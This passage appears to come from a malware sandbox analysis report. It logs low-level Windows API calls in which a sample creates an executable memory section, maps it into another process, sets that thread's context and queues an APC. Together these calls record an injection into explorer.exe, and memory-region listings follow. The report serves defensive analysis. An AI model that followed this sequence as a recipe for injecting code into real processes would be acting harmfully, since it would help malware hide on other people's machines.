[99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0066.699] NtCreateSection (in: SectionHandle=0x12e424, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x12e3e4, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x12e424*=0x130) returned 0x0 [0066.699] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0xffffffff, BaseAddress=0x12e42c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x12e3e4*=0x15fa00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x12e42c*=0xa200000, SectionOffset=0x0, ViewSize=0x12e3e4*=0x160000) returned 0x0 [0066.699] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0x128, BaseAddress=0x12e428*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x12e420*=0x15fa00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x12e428*=0x6240000, SectionOffset=0x0, ViewSize=0x12e420*=0x160000) returned 0x0 [0067.277] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xa200000) returned 0x0 [0067.285] NtClose (Handle=0x130) returned 0x0 [0067.289] NtSetContextThread (ThreadHandle=0x12c, Context=0x12e798*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x266ec70, Ebx=0x0, Edx=0x0, Ecx=0xf, Eax=0x27407d0, Ebp=0x1afaac, Eip=0x630dba7, SegCs=0x1b, EFlags=0x246, Esp=0x1afa90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0067.292] NtQueueApcThread (ThreadHandle=0x12c, ApcRoutine=0x630dbac, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0067.295] NtResumeThread (in: ThreadHandle=0x12c, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0067.295] NtClose (Handle=0x12c) returned 0x0 [0067.299] PostThreadMessageW (idThread=0x614, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0067.460] NtDelayExecution (Alertable=0, Interval=0x12e134*=-30000000) returned 0x0 [0070.474] NtReadVirtualMemory (in: ProcessHandle=0x128, BaseAddress=0x6347a00, Buffer=0x12e158, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x12e158*, NumberOfBytesRead=0x0) returned 0x0 [0070.474] NtClose (Handle=0x128) returned 0x0 [0070.474] NtOpenProcess (in: ProcessHandle=0x12f1e8, DesiredAccess=0x438, ObjectAttributes=0x12eaa8*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x12ea7c*(UniqueProcess=0xbd4, UniqueThread=0x0) | out: ProcessHandle=0x12f1e8*=0x128) returned 0x0 [0070.474] NtOpenThread (in: ThreadHandle=0x12f1ec, DesiredAccess=0x1a, ObjectAttributes=0x12eaa8, ClientId=0x12ea74*(UniqueProcess=0x0, UniqueThread=0xbd8) | out: ThreadHandle=0x12f1ec*=0x12c) returned 0x0 [0070.480] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\System32\\cmmon32.exe", NtPathName=0x12e0f8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\System32\\cmmon32.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0070.481] NtCreateFile (in: FileHandle=0x12e118, DesiredAccess=0x120089, ObjectAttributes=0x12e0e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\System32\\cmmon32.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x12e100, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x12e118*=0x130, IoStatusBlock=0x12e100*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0070.484] NtQueryInformationFile (in: FileHandle=0x130, IoStatusBlock=0x12e100, FileInformation=0x12e058, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x12e100, FileInformation=0x12e058) returned 0x0 [0070.500] ExitProcess (uExitCode=0x0) [0070.501] UnhookWindowsHookEx (hhk=0xa018f) returned 1 [0070.501] CloseHandle (hObject=0x60) returned 1 [0070.501] CloseHandle (hObject=0x64) returned 1 [0070.502] VirtualFree (lpAddress=0x1310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.505] HeapDestroy (hHeap=0x1300000) returned 1 Thread: id = 65 os_tid = 0xbcc Process: id = "7" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x7f1e6320" os_pid = "0x610" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "6" os_parent_pid = "0xb84" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1089 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1090 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1091 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1092 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1093 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1094 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1095 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1096 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1097 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1098 start_va = 0x100000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1099 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1100 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1101 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1102 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1103 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1104 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1105 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1106 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1107 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1108 start_va = 0x3c0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1109 start_va = 0x3f0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1110 start_va = 0x410000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1111 start_va = 0x420000 end_va = 0x421fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1112 start_va = 0x430000 end_va = 0x431fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1113 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1114 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1115 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1116 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1117 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1118 start_va = 0x680000 end_va = 0x75efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1119 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1120 start_va = 0x7a0000 end_va = 0x7a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1121 start_va = 0x7b0000 end_va = 0x7b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1122 start_va = 0x7c0000 end_va = 0x7c0fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1123 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1124 start_va = 0x810000 end_va = 0x812fff entry_point = 0x810000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui") Region: id = 1125 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1126 start_va = 0x830000 end_va = 0x859fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1127 start_va = 0x860000 end_va = 0x868fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1128 start_va = 0x870000 end_va = 0x877fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 1129 start_va = 0x880000 end_va = 0x880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 1130 start_va = 0x890000 end_va = 0x893fff entry_point = 0x890000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1131 start_va = 0x8a0000 end_va = 0x923fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1132 start_va = 0x930000 end_va = 0xbb0fff entry_point = 0x930000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1133 start_va = 0xbc0000 end_va = 0x17bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1134 start_va = 0x17c0000 end_va = 0x1bb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017c0000" filename = "" Region: id = 1135 start_va = 0x1bc0000 end_va = 0x1e8efff entry_point = 0x1bc0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1136 start_va = 0x1e90000 end_va = 0x1efbfff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1137 start_va = 0x1f00000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1138 start_va = 0x2000000 end_va = 0x2024fff entry_point = 0x2000000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy 